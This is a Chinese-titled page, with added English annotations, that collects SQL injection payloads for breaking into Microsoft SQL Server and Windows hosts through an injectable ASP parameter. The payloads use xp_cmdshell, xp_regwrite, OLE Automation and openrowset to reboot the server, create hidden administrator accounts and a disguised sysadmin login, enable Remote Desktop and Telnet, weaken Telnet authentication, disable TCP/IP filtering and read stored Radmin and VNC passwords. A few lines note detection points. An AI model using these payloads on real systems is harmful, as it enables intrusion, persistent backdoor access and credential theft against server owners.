总结的几个入侵时可能用到的SQL语句
http://192.168.200.188/product_list.asp?classid=14;
-- Stacked-query payloads appended to the injectable classid parameter in the URL above.
-- All three run through master..xp_cmdshell, so the SQL login the web application uses
-- must hold sysadmin-level rights and xp_cmdshell must be enabled (see the sp_configure
-- section at the end of this page). The trailing `--` comments out whatever the
-- application appends after the parameter.
exec master..xp_cmdshell 'iisreset /reboot /timeout:00';-- reboots the host immediately, no prompt
exec master..xp_cmdshell 'net user hi$ 123 /add';-- adds local user hi$ with password 123 (the $ suffix is an attacker convention; do not rely on it hiding the account from `net user`)
exec master..xp_cmdshell 'net localgroup administrators hi$ /add';-- adds hi$ to the local Administrators group
http://192.168.200.188/product_list.asp?classid=14;
-- Registry write through xp_regwrite (sysadmin required): sets the Terminal Services
-- (TermService) startup type. Windows service Start values: 2 = Automatic, 3 = Manual,
-- 4 = Disabled. This only changes the startup type; the service is not started here.
exec master..xp_regwrite
'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\TermService','Start','REG_DWord',2;-- Terminal Services to Automatic (4 = disabled, 2 = automatic)
http://192.168.200.188/product_list.asp?classid=14
-- Clears fDenyTSConnections so the host accepts Remote Desktop connections (1 denies,
-- 0 allows). Combined with the TermService startup change above this exposes RDP; the
-- firewall state is not touched by this payload.
;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWord',0;-- enables Remote Desktop
http://192.168.200.188/product_list.asp?classid=14
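-- Reboot without xp_cmdshell: instantiate a WScript.Shell COM object with sp_OACreate
-- and call its Run method with the same iisreset command as above. The sp_OA* OLE
-- Automation procedures also require sysadmin and, on SQL Server 2005 and later, must
-- first be enabled with sp_configure 'Ole Automation Procedures', 1 (not shown on this
-- page). The original page put its annotation after `//`, which is not a T-SQL comment
-- and would make the one-liner fail to parse; it is a `--` comment here.
declare @cmd INT
exec sp_oacreate 'wscript.shell',@cmd output
exec sp_oamethod @cmd,'run',null,'iisreset /reboot /timeout:00','0','true'   -- reboots directly, no prompt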
http://192.168.200.188/product_list.asp?classid=14
-- Creates a new SQL login and adds it to the sysadmin fixed server role. sp_addlogin is
-- called without a password argument, so the login starts with an empty password (the
-- sp_password call further down sets one). The name appears chosen to resemble the
-- BUILTIN\Administrators Windows group so it is overlooked in a login list; it is still
-- an ordinary SQL login and shows up in sys.sql_logins / syslogins.
;exec sp_addlogin BUILUET_Administrators;exec sp_addsrvrolemember BUILUET_Administrators,sysadmin;-- add login, then grant sysadmin
http://192.168.200.188/product_list.asp?classid=14
-- Cleanup counterpart of the sp_addlogin payload above: removes the login again.
;exec sp_droplogin BUILUET_Administrators;-- drops the login
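-- Sets a password on the login created above: sp_password @old = null (the login
-- currently has an empty password), @new = xxxxx, @loginame = 'BUILUET_Administrators'.
-- Replace xxxxx with the real value. sp_password is deprecated on SQL Server 2005 and
-- later; the equivalent there is ALTER LOGIN BUILUET_Administrators WITH PASSWORD = '...'.
-- The original page's annotation was on a `//` line, which is not a T-SQL comment.
exec sp_password null,xxxxx,'BUILUET_Administrators'   -- changes BUILUET_Administrators from an empty password to xxxxx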
-- Same local-account creation as the hi$ payload, with xp_cmdshell fully qualified as
-- master.dbo.xp_cmdshell. `/ad` is accepted by net.exe as an abbreviation of `/add`.
-- The account name mimics the ASP.NET worker-process account, presumably so it blends
-- into the user list; the page does not say.
exec master.dbo.xp_cmdshell 'net user ASPNET_v2.0 111111 /ad';--   -- adds local user ASPNET_v2.0 with password 111111
exec master.dbo.xp_cmdshell 'net localgroup administrators ASPNET_v2.0 /ad';--   -- adds it to local Administrators
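-- Lists the host's fixed drives (drive letter and free space in MB). Typically used to
-- find a writable path before dropping files; needs sysadmin like the other master..xp_*
-- calls. The original annotation was a bare `//` line, which is not a T-SQL comment.
exec master..xp_fixeddrives   -- lists fixed drives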
http://192.168.200.188/product_list.asp?classid=14
-- Disables Windows TCP/IP filtering by writing EnableSecurityFilters=0 under the
-- Tcpip\Parameters key of both CurrentControlSet and ControlSet001, then forces a reboot
-- with iisreset. The reboot is part of the payload, presumably because the filter setting
-- is only read at boot. Writing ControlSet001 as well presumably covers the case where
-- CurrentControlSet links to a different numbered set; HKLM\SYSTEM\Select\Current says
-- which one is live. Three sysadmin-only extended procedures are used (xp_regwrite x2,
-- xp_cmdshell).
declare @r varchar(255)
set @r='HKEY_LOCAL_MACHINE'
exec master..xp_regwrite @r,'SYSTEM\currentControlSet\Services\Tcpip\Parameters\','EnableSecurityFilters','REG_DWORD',0
exec master..xp_regwrite @r,'SYSTEM\ControlSet001\Services\Tcpip\Parameters\','EnableSecurityFilters','REG_DWORD',0
exec master..xp_cmdshell 'iisreset /reboot /timeout:00';-- turns off TCP/IP filtering, then reboots
-- Enables the Telnet server: set the TlntSvr service startup type to Automatic (2), then
-- start it now with net.exe via xp_cmdshell.
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\TlntSvr','Start','REG_DWord',2;-- Telnet service set to Automatic
-- NOTE(review): unlike the other payloads on this page this line has no trailing `--`,
-- so when injected, whatever the application appends after the parameter is still
-- executed as part of the statement.
exec master.dbo.xp_cmdshell 'net start TlntSvr'
如果已经能在主机上直接执行命令,那就直接运行:tlntadmn config sec = -ntlm
通过 SQL 注入执行时,可以直接运行:
-- Reconfigures the Telnet server's authentication: `sec = -ntlm` removes NTLM from the
-- allowed mechanisms, leaving plain password logon, so the local accounts created
-- earlier on this page can log in over Telnet with a password.
;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--
运行以后就关闭了 Telnet 服务的 NTLM 认证(tlntadmn 的 sec 参数中 -ntlm 表示去掉 NTLM 方式),之后通常即可用前面新建的账户以口令方式登录 Telnet。
首先通过 xp_regwrite 修改注册表中 Jet 4.0 引擎的 SandBoxMode(设为 1;按微软的取值说明,1 表示只对 Access 自身启用沙盒、对 SQL Server 这类非 Access 调用方关闭沙盒,从而允许在查询中调用 Shell()):
-- Prerequisite for the openrowset/Jet technique below: write SandBoxMode=1 under the Jet
-- 4.0 engine key. Per Microsoft's documented values, 1 keeps the sandbox only for Access
-- itself and turns it off for non-Access callers such as SQL Server, so Shell() is
-- permitted inside the Jet query. The page calls this "enabling sandbox mode"; for this
-- caller it effectively disables it. Requires xp_regwrite (sysadmin).
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
然后通过 openrowset 调用 Microsoft.Jet.OLEDB.4.0 提供程序,在 Access 查询中用 shell() 执行系统命令(需要先开启 Ad Hoc Distributed Queries,见文末的 sp_configure 语句):
-- Command execution without xp_cmdshell: openrowset opens an Access database through the
-- Microsoft.Jet.OLEDB.4.0 provider and runs a Jet query whose Shell() call executes
-- cmd.exe. ias.mdb is presumably used only because it is an .mdb present at a known path
-- on a default install; any readable .mdb would do. Needs 'Ad Hoc Distributed Queries'
-- enabled (sp_configure block at the end of this page), the SandBoxMode registry change
-- above, and the Jet provider, which is 32-bit only and so unavailable to a 64-bit
-- SQL Server instance.
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user daxia$ sdfdssdf /add")')   -- adds local user daxia$
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup administrators daxia$ /add")')   -- adds it to local Administrators
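-- Registry reads via xp_regread (sysadmin required). In the original page the RDP-Tcp
-- PortNumber path was split across two lines, which would embed a line break in the
-- string literal; it is a single literal here. The annotations were bare prose lines
-- and are `--` comments now.
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'   -- reads the Remote Desktop listening port (3389 unless changed)
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter'   -- reads the stored Radmin 2.x password value
exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\RealVNC\WinVNC4','password'   -- reads the RealVNC 4 stored password (an encoded value; the page says to crack it offline afterwards)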
由于存在安全隐患,所以在 SQL Server 中(2005 起),xp_cmdshell 默认是关闭的。关闭它的语句:
-- Disable xp_cmdshell. 'show advanced options' must be on before the xp_cmdshell option
-- is visible to sp_configure; each RECONFIGURE applies the preceding change, and `go`
-- ends the batch.
exec sp_configure 'show advanced options',1
reconfigure
go
exec sp_configure 'xp_cmdshell',0   -- 0 = disabled
reconfigure
go
开启 xp_cmdshell 的语句(需要 sysadmin 权限;sp_configure 对 xp_cmdshell 的改动是常见的监控/告警点):
-- Enable xp_cmdshell (the prerequisite for every master..xp_cmdshell payload on this
-- page). Same shape as the disable block: expose advanced options, then set the option
-- to 1 and RECONFIGURE. Changing this option requires sysadmin and is a common
-- detection point for defenders.
exec sp_configure 'show advanced options',1
reconfigure
go
exec sp_configure 'xp_cmdshell',1   -- 1 = enabled
reconfigure
go
-- Enable 'Ad Hoc Distributed Queries', which the openrowset(...) Jet payloads above
-- depend on (openrowset against an ad hoc provider is refused while it is 0). Advanced
-- options are exposed first, as in the xp_cmdshell blocks; there is no `go` between the
-- two RECONFIGUREs here, which is fine within one batch.
exec sp_configure 'show advanced options',1
reconfigure
exec sp_configure 'Ad Hoc Distributed Queries',1   -- 1 = enabled
reconfigure
go